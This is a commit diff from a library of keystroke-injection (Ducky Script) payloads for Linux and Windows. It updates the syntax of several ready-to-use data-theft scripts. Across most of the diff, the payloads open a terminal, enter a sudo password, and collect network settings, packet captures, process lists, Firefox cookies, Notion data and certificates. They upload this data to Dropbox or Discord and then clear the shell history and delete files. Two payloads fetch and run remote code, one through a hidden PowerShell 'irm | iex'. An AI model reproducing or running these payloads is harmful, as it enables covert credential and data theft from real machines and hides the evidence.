STRING rm -rf "$TMP_FOLDER_PATH" STRINGLN rm -rf "$TMP_FOLDER_PATH"
ENTER

2
payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/README.md
View File

@ -1,5 +1,5 @@
# Exfiltrate Network Configuration - Linux # Exfiltrate Network Configuration - Linux
A script used to exfiltrate the network configuration on a Linux machine. A script used to exfiltrate the network configuration on a Linux machine.

125
payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt
View File

@ -1,96 +1,101 @@
REM_BLOCK
REM ########################################################## ##########################################################
REM # | # #
REM # Title : Exfiltrate Linux Network Configuration | # Title : Exfiltrate Linux Network Configuration #
REM # Author : Aleff | # Author : Aleff #
REM # Version : 1.0 | # Version : 1.0 #
REM # Category : Exfiltration, Execution | # Category : Exfiltration, Execution #
REM # Target : Linux | # Target : Linux #
REM # | # #
REM ########################################################## ##########################################################
END_REM
REM Requirements: REM Requirements:
REM - Internet Connection REM - Internet Connection
REM - Dropbox Account REM - Dropbox Account
REM - - DROPBOX_ACCESS_TOKEN REM - - DROPBOX_ACCESS_TOKEN
DELAY 1000
CTRL-ALT t
DELAY 2000
REM Required: Set here your Dropbox access TOKEN REM Required: Set here your Dropbox access TOKEN
DEFINE TOKEN example DEFINE #TOKEN example
STRING ACCESS_TOKEN="
STRING TOKEN
STRING "
ENTER
REM DELAY 500 REM Set yout Dropbox folder name
REM STRING USER_NAME=$(whoami) DEFINE #DROPBOX_FOLDER_NAME example
REM ENTER
REM This is just a Dropbox const, don't edit
DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
CTRL-ALT t
DELAY 2000
STRINGLN ACCESS_TOKEN="#TOKEN"
DELAY 500 DELAY 500
STRING RANDOM=$(shuf -i 1-999999999999 -n 1) STRINGLN USER_NAME=$(whoami)
ENTER
DELAY 500 DELAY 500
STRING ZIP_NAME="$RANDOM.zip" STRINGLN RANDOM=$(shuf -i 1-999999999999 -n 1)
ENTER
DELAY 500 DELAY 500
STRING ZIP_PATH="/home/$USER_NAME/Documents/$ZIP_NAME" STRINGLN ZIP_NAME="$RANDOM.zip"
ENTER DELAY 500
STRINGLN ZIP_PATH="/home/$USER_NAME/Documents/$ZIP_NAME"
REM Folder path REM Folder path
DELAY 500 DELAY 500
STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/Documents" prefix-XXXXXXXXXX) STRINGLN TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/Documents" prefix-XXXXXXXXXX)
ENTER
DELAY 500 DELAY 500
STRING nmcli > "$TMP_FOLDER_PATH/nmcli.txt" STRINGLN nmcli > "$TMP_FOLDER_PATH/nmcli.txt"
ENTER
DELAY 1000 DELAY 1000
STRING nmcli connection show > "$TMP_FOLDER_PATH/nmcli_connection.txt" STRINGLN nmcli connection show > "$TMP_FOLDER_PATH/nmcli_connection.txt"
ENTER
DELAY 1000 DELAY 1000
STRING nmcli device show > "$TMP_FOLDER_PATH/nmcli_device.txt" STRINGLN nmcli device show > "$TMP_FOLDER_PATH/nmcli_device.txt"
ENTER
DELAY 1000 DELAY 1000
REM Delay for zipping operation, it depends by computer power and folder directory REM Delay for zipping operation, it depends by computer power and folder directory
STRING zip -r "$ZIP_PATH" "$TMP_FOLDER_PATH" STRING zip -r "$ZIP_PATH" "$TMP_FOLDER_PATH"
DELAY 3000 DELAY 3000
STRINGLN DROPBOX_FOLDER="/#DROPBOX_FOLDER_NAME"
REM Set yout Dropbox folder name
DEFINE DROPBOX_FOLDER_NAME example
STRING DROPBOX_FOLDER="/
ENTER
STRING DROPBOX_FOLDER_NAME
ENTER
STRING "
ENTER
DELAY 500 DELAY 500
DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
STRING curl -X POST STRINGLN curl -X POST#DROPBOX_API_CONST --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
STRING DROPBOX_API_CONST
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
ENTER
DELAY 2000 DELAY 2000
STRING history -c STRINGLN history -c
ENTER
DELAY 500 DELAY 500
STRING rm -rf "$TMP_FOLDER_PATH" STRINGLN rm -rf "$TMP_FOLDER_PATH"
ENTER
DELAY 500 DELAY 500
STRING rm -rf "$ZIP_PATH" STRINGLN rm -rf "$ZIP_PATH"; exit
ENTER
DELAY 500
STRING exit
ENTER

95
payloads/library/exfiltration/ExfiltrateNetworkTraffic_Linux/payload.txt
View File

@ -1,57 +1,76 @@
REM_BLOCK
REM ############################################# #############################################
REM # | # #
REM # Title : Exfiltrate Network Traffic | # Title : Exfiltrate Network Traffic #
REM # Author : Aleff | # Author : Aleff #
REM # Version : 1.0 | # Version : 1.0 #
REM # Category : Exfiltration | # Category : Exfiltration #
REM # Target : Linux | # Target : Linux #
REM # | # #
REM ############################################# #############################################
END_REM
REM Requirements: REM Requirements:
REM - Permissions REM - Permissions
REM - Internet Connection REM - Internet Connection
REM REQUIRED: You need to know the sudo password and replace 'example' with this REM REQUIRED: You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example DEFINE #SUDO_PASS example
REM REQUIRED: Set what you want to sniff, for example tcp port 80 REM REQUIRED: Set what you want to sniff, for example tcp port 80
DEFINE SNIFFING example DEFINE #SNIFFING example
REM Set your Dropbox link or whatever you want to use to exfiltrate the sniff file REM Set your Dropbox link or whatever you want to use to exfiltrate the sniff file
DEFINE TOKEN example DEFINE #TOKEN example
REM Just a Dropbox const REM Just a Dropbox const
DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
REM Output file path packets.pcap, remember to use pcap extension REM Output file path packets.pcap, remember to use pcap extension
DEFINE FILE example.pcap DEFINE #FILE example.pcap
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
DELAY 1000
CTRL-ALT t CTRL-ALT t
DELAY 2000 DELAY 2000
REM #### PERMISSIONS SECTION #### REM #### PERMISSIONS SECTION ####
STRINGLN sudo su STRINGLN sudo su
DELAY 1000 DELAY 1000
STRINGLN SUDO_PASS STRINGLN #SUDO_PASS
DELAY 1000 DELAY 1000
REM #### Network Traffic SECTION #### REM #### Network Traffic SECTION ####
STRINGLN FILE_PATH="#FILE"
STRING FILE_PATH="
STRING FILE
STRING "
ENTER
DELAY 500 DELAY 500
STRING filter_expression=" STRINGLN filter_expression="#SNIFFING"
STRING SNIFFING
STRING "
ENTER
DELAY 500 DELAY 500
REM Network card name REM Network card name
@ -71,28 +90,18 @@ DELAY 60000
REM Kill the process by PID REM Kill the process by PID
STRINGLN kill $tcpdump_pid STRINGLN kill $tcpdump_pid
REM #### Exfiltrate SECTION #### REM #### Exfiltrate SECTION ####
REM You can use whatever you want, i use Dropbox REM You can use whatever you want, i use Dropbox
STRING ACCESS_TOKEN=" STRINGLN ACCESS_TOKEN="#TOKEN"
STRING TOKEN
STRING "
ENTER
DELAY 500 DELAY 500
STRINGLN DROPBOX_FOLDER="/Exfiltration" STRINGLN DROPBOX_FOLDER="/Exfiltration"
DELAY 500 DELAY 500
STRING curl -X POST STRINGLN curl -X POST#DROPBOX_API_CONST--header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$FILE_PATH"
STRING DROPBOX_API_CONST
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$FILE_PATH"
ENTER
REM #### REMOVE TRACES #### REM #### REMOVE TRACES ####
STRINGLN rm "$FILE_PATH" STRINGLN rm "$FILE_PATH"
DELAY 500 DELAY 500

79
payloads/library/exfiltration/ExfiltratePhotosThroughShell/payload.txt
View File

@ -1,13 +1,14 @@
REM_BLOCK
REM ################################################## ##################################################
REM # | # #
REM # Title : Exfiltrate Photos Through Shell | # Title : Exfiltrate Photos Through Shell #
REM # Author : Aleff | # Author : Aleff #
REM # Version : 1.0 | # Version : 1.0 #
REM # Category : Exfiltration | # Category : Exfiltration #
REM # Target : Linux | # Target : Linux #
REM # | # #
REM ################################################## ##################################################
END_REM
REM Requirements: REM Requirements:
REM - Internet Connection REM - Internet Connection
@ -17,49 +18,63 @@ REM - if you need to install 'fswebcam'
REM - for add the -x permission to the script.sh downloaded REM - for add the -x permission to the script.sh downloaded
REM REQUIRED - replace example.com with your script.sh link REM REQUIRED - replace example.com with your script.sh link
DEFINE SCRIPT-SH-LINK example.com DEFINE #SCRIPT-SH-LINK example.com
REM REQUIRED - sudo Password REM REQUIRED - sudo Password
DEFINE SUDO-PSWD example DEFINE #SUDO-PSWD example
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
DELAY 1000
CTRL-ALT t CTRL-ALT t
DELAY 2000 DELAY 2000
REM #### Permission #### REM #### Permission ####
REM This section of sudo time depends by the computer power on which it runs. REM This section of sudo time depends by the computer power on which it runs.
REM So if you know that the computer on which you run the payload is too slow, increase it by a few seconds, otherwise you can try running it as it is set now or smaller depending on your needs. REM So if you know that the computer on which you run the payload is too slow, increase it by a few seconds, otherwise you can try running it as it is set now or smaller depending on your needs.
STRING sudo su STRINGLN sudo su
ENTER
DELAY 500 DELAY 500
STRING SUDO-PSWD STRINGLN #SUDO-PSWD
ENTER
REM DELAY Based On Computer Power REM DELAY Based On Computer Power
DELAY 5000 DELAY 5000
REM If you want to install the dependency of fswebcam you should decommend it. REM If you want to install the dependency of fswebcam you should decommend it.
REM STRING apt install fswebcam -y REM STRINGLN apt install fswebcam -y
REM ENTER
REM DELAY Based On Internet Power REM DELAY Based On Internet Power
REM DELAY 5000 REM DELAY 5000
REM #### Script #### REM #### Script ####
STRINGLN curl #SCRIPT-SH-LINK > script.sh
STRING curl
STRING SCRIPT-SH-LINK
STRING > script.sh
ENTER
REM DELAY Based On Internet Power REM DELAY Based On Internet Power
DELAY 4000 DELAY 4000
STRING chmod +x script.sh STRINGLN chmod +x script.sh
ENTER
DELAY 500 DELAY 500
STRING nohup ./script.sh > /dev/null 2>&1 & exit STRINGLN nohup ./script.sh > /dev/null 2>&1 & exit
ENTER

98
payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/payload.txt
View File

@ -1,73 +1,79 @@
REM_BLOCK
REM ########################################## ##########################################
REM # | # #
REM # Title : Exfiltrate Process Info | # Title : Exfiltrate Process Info #
REM # Author : Aleff | # Author : Aleff #
REM # Version : 1.0 | # Version : 1.0 #
REM # Category : Exfiltration | # Category : Exfiltration #
REM # Target : Linux | # Target : Linux #
REM # | # #
REM ########################################## ##########################################
END_REM
REM Requirements: REM Requirements:
REM - Internet Connection REM - Internet Connection
REM - Discord Webhook REM - Discord Webhook
DELAY 1000 REM Set yout Dropbox folder name
DEFINE #DROPBOX_FOLDER_NAME example
REM This is just a Dropbox const, don't edit
DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
CTRL-ALT t CTRL-ALT t
DELAY 2000 DELAY 2000
REM #### GET PROCESS SECTION #### REM #### GET PROCESS SECTION ####
STRINGLN ps aux > process.txt
STRING ps aux > process.txt
ENTER
DELAY 500 DELAY 500
REM #### EXFILTRATE SECTION #### REM #### EXFILTRATE SECTION ####
REM Required: Set here your Dropbox access TOKEN REM Required: Set here your Dropbox access TOKEN
DEFINE TOKEN example DEFINE TOKEN example
STRING ACCESS_TOKEN=" STRINGLN ACCESS_TOKEN="#TOKEN"
STRING TOKEN
STRING "
ENTER
DELAY 500 DELAY 500
STRING USER_NAME=$(whoami) STRINGLN USER_NAME=$(whoami)
ENTER
DELAY 500 DELAY 500
STRING TXT_PATH="/home/$USER_NAME/process.txt" STRINGLN TXT_PATH="/home/$USER_NAME/process.txt"
ENTER
DELAY 500 DELAY 500
REM Set yout Dropbox folder name STRINGLN DROPBOX_FOLDER="/#DROPBOX_FOLDER_NAME"
DEFINE DROPBOX_FOLDER_NAME example
STRING DROPBOX_FOLDER="/
STRING DROPBOX_FOLDER_NAME
STRING "
ENTER
DELAY 500 DELAY 500
DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload STRINGLN curl -X POST#DROPBOX_API_CONST --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$TXT_PATH"
STRING curl -X POST
STRING DROPBOX_API_CONST
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$TXT_PATH"
ENTER
REM It depends by the internet connection, btw 1 or 2 seconds, generally, is sufficient REM It depends by the internet connection, btw 1 or 2 seconds, generally, is sufficient
DELAY 2000 DELAY 2000
REM #### REMOVE TRACES #### REM #### REMOVE TRACES ####
STRINGLN history -c; exit
STRING history -c
ENTER
DELAY 500
STRING exit
ENTER

70
payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/payload.txt
View File

@ -1,26 +1,66 @@
REM ########################################## REM_BLOCK
REM # | ##########################################
REM # Title : Exfiltrate Process Info | # #
REM # Author : Aleff | # Title : Exfiltrate Process Info #
REM # Version : 1.0 | # Author : Aleff #
REM # Category : Exfiltration | # Version : 1.0 #
REM # Target : Windows 10-11 | # Category : Exfiltration #
REM # | # Target : Windows 10-11 #
REM ########################################## # #
##########################################
END_REM
REM Requirements: REM Requirements:
REM - Internet Connection REM - Internet Connection
REM - Dropbox Webhook REM - Dropbox Webhook
REM REQUIRED - Reply example.com with YOUR LINK. The Payload should be ExfiltrateProcessInfo.ps1 REM REQUIRED - Reply example.com with YOUR LINK. The Payload should be ExfiltrateProcessInfo.ps1
DEFINE PAYLOAD example.com DEFINE #PAYLOAD example.com
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
DELAY 2000
GUI r GUI r
DELAY 250 DELAY 250
DELETE DELETE
STRING powershell -w h -ep bypass irm STRINGLN powershell -w h -ep bypass irm #PAYLOAD | iex
STRING PAYLOAD
STRING | iex
ENTER

8
payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/README.md
View File

@ -33,17 +33,11 @@ Open a PowerShell, the get dinamically the Notion full-path and then add the `no
</a> </a>
<br>Github <br>Github
</td> </td>
<td align="center" width="96">
<a href="https://www.instagram.com/alessandro_greco_aka_aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/instagram.png?raw=true width="48" height="48" />
</a>
<br>Instagram
</td>
<td align="center" width="96"> <td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/"> <a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" /> <img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a> </a>
<br>Discord <br>Linkedin
</td> </td>
</tr> </tr>
</table> </table>

68
payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/payload.txt
View File

@ -1,26 +1,68 @@
REM ######################################################################### REM_BLOCK
REM # | #########################################################################
REM # Title : Exfiltrates the entire database of the Notion client | # #
REM # Author : Aleff | # Title : Exfiltrates the entire database of the Notion client #
REM # Version : 1.0 | # Author : Aleff #
REM # Category : Exfiltration | # Version : 1.0 #
REM # Target : Windows 10-11 | # Category : Exfiltration #
REM # | # Target : Windows 10-11 #
REM ######################################################################### # #
#########################################################################
END_REM
REM Requirements: REM Requirements:
REM - Notion must be installed REM - Notion must be installed
REM - Internet Connection REM - Internet Connection
REM You must define your Dropbox accessToken or modify the exfiltration modality. REM You must define your Dropbox accessToken or modify the exfiltration modality.
DEFINE #DROPBOX_ACCESS_TOKEN example DEFINE #DROPBOX_ACCESS_TOKEN example
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r GUI r
DELAY 1000 DELAY 1000
STRING PowerShell STRINGLN PowerShell
ENTER
DELAY 2000 DELAY 2000
REM Settings about Notion DB REM Settings about Notion DB

80
payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt
View File

@ -1,31 +1,69 @@
REM #################################################### REM_BLOCK
REM # | ####################################################
REM # Title : Export Firefox Cookies Database | # #
REM # Author : Aleff | # Title : Export Firefox Cookies Database #
REM # Version : 1.0 | # Author : Aleff #
REM # Category : Exfiltration | # Version : 1.0 #
REM # Target : Windows 10-11 | # Category : Exfiltration #
REM # | # Target : Windows 10-11 #
REM #################################################### # #
####################################################
END_REM
REM Requirements: REM Requirements:
REM - Firefox must be installed REM - Firefox must be installed
REM You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token. REM You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token.
DEFINE DROPBOX_ACCESS_TOKEN "example" DEFINE #DROPBOX_ACCESS_TOKEN "example"
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
DELAY 1000
GUI r GUI r
DELAY 500 DELAY 500
STRING powershell STRINGLN powershell
DELAY 500
ENTER
DELAY 2000 DELAY 2000
REM Get cookies DB path REM Get cookies DB path
STRINGLN STRINGLN
$firefoxProfilePath = Join-Path -Path $env:APPDATA -ChildPath 'Mozilla\Firefox\Profiles' $firefoxProfilePath = Join-Path -Path $env:APPDATA -ChildPath 'Mozilla\Firefox\Profiles'
@ -33,14 +71,8 @@ STRINGLN
$filePath = Join-Path -Path $firefoxProfile.FullName -ChildPath 'cookies.sqlite' $filePath = Join-Path -Path $firefoxProfile.FullName -ChildPath 'cookies.sqlite'
END_STRINGLN $accessToken = #DROPBOX_ACCESS_TOKEN
REM Setting about exfiltration
STRING $accessToken =
STRING DROPBOX_ACCESS_TOKEN
ENTER
STRINGLN
$uploadUrl = "https://content.dropboxapi.com/2/files/upload" $uploadUrl = "https://content.dropboxapi.com/2/files/upload"
$dropboxFilePath = "/cookies_exported.sqlite" $dropboxFilePath = "/cookies_exported.sqlite"

66
payloads/library/exfiltration/Export_all_saved_certificates_with_Adobe_Reader/payload.txt
View File

@ -1,26 +1,68 @@
REM #################################################################### REM_BLOCK
REM # | ####################################################################
REM # Title : Export all saved certificates with Adobe Reader | # #
REM # Author : Aleff | # Title : Export all saved certificates with Adobe Reader #
REM # Version : 1.0 | # Author : Aleff #
REM # Category : Exfiltration | # Version : 1.0 #
REM # Target : Windows 10-11 | # Category : Exfiltration #
REM # | # Target : Windows 10-11 #
REM #################################################################### # #
####################################################################
END_REM
REM Requirements: REM Requirements:
REM - Adobe Reader must be installed REM - Adobe Reader must be installed
REM - Internet Connection REM - Internet Connection
REM You must define your Dropbox accessToken or modify the exfiltration modality. REM You must define your Dropbox accessToken or modify the exfiltration modality.
DEFINE #DROPBOX_ACCESS_TOKEN example DEFINE #DROPBOX_ACCESS_TOKEN example
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r GUI r
DELAY 1000 DELAY 1000
STRING PowerShell STRINGLN PowerShell
DELAY 2000 DELAY 2000
REM Settings about Adobe Reader REM Settings about Adobe Reader

71
payloads/library/exfiltration/Exports_all_the_links_of_the_downloads/payload.txt
View File

@ -1,20 +1,63 @@
REM ########################################################### REM_BLOCK
REM # | ###########################################################
REM # Title : Exports all the links of the downloads | # #
REM # Author : Aleff | # Title : Exports all the links of the downloads #
REM # Version : 1.0 | # Author : Aleff #
REM # Category : Exfiltration | # Version : 1.0 #
REM # Target : Windows 10/11 | # Category : Exfiltration #
REM # | # Target : Windows 10/11 #
REM ########################################################### # #
###########################################################
END_REM
REM Requirements: REM Requirements:
REM - Firefox installed REM - Firefox installed
REM You must define your Discord webhook if you want to use this method for the exfiltration REM You must define your Discord webhook if you want to use this method for the exfiltration
DEFINE DISCORD_WEBHOOK example DEFINE #DISCORD_WEBHOOK example
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
REM Open Firefox REM Open Firefox
GUI GUI
@ -49,9 +92,7 @@ DELAY 10000
STRINGLN " STRINGLN "
REM Exfiltration using Discord Webhook REM Exfiltration using Discord Webhook
STRING $WebhookUrl = " STRINGLN $WebhookUrl = "#DISCORD_WEBHOOK"
STRING DISCORD_WEBHOOK
STRINGLN "
STRINGLN $Payload = @{content = $DOWNLOADS} | ConvertTo-Json STRINGLN $Payload = @{content = $DOWNLOADS} | ConvertTo-Json

112
payloads/library/exfiltration/ProtonVPN-config/payload.txt
View File

@ -1,43 +1,83 @@
REM ################################################################### REM_BLOCK
REM # | ###################################################################
REM # Title : ProtonVPN-config-to-Discord-Exfiltration | # #
REM # Author : Aleff | # Title : ProtonVPN-config-to-Discord-Exfiltration #
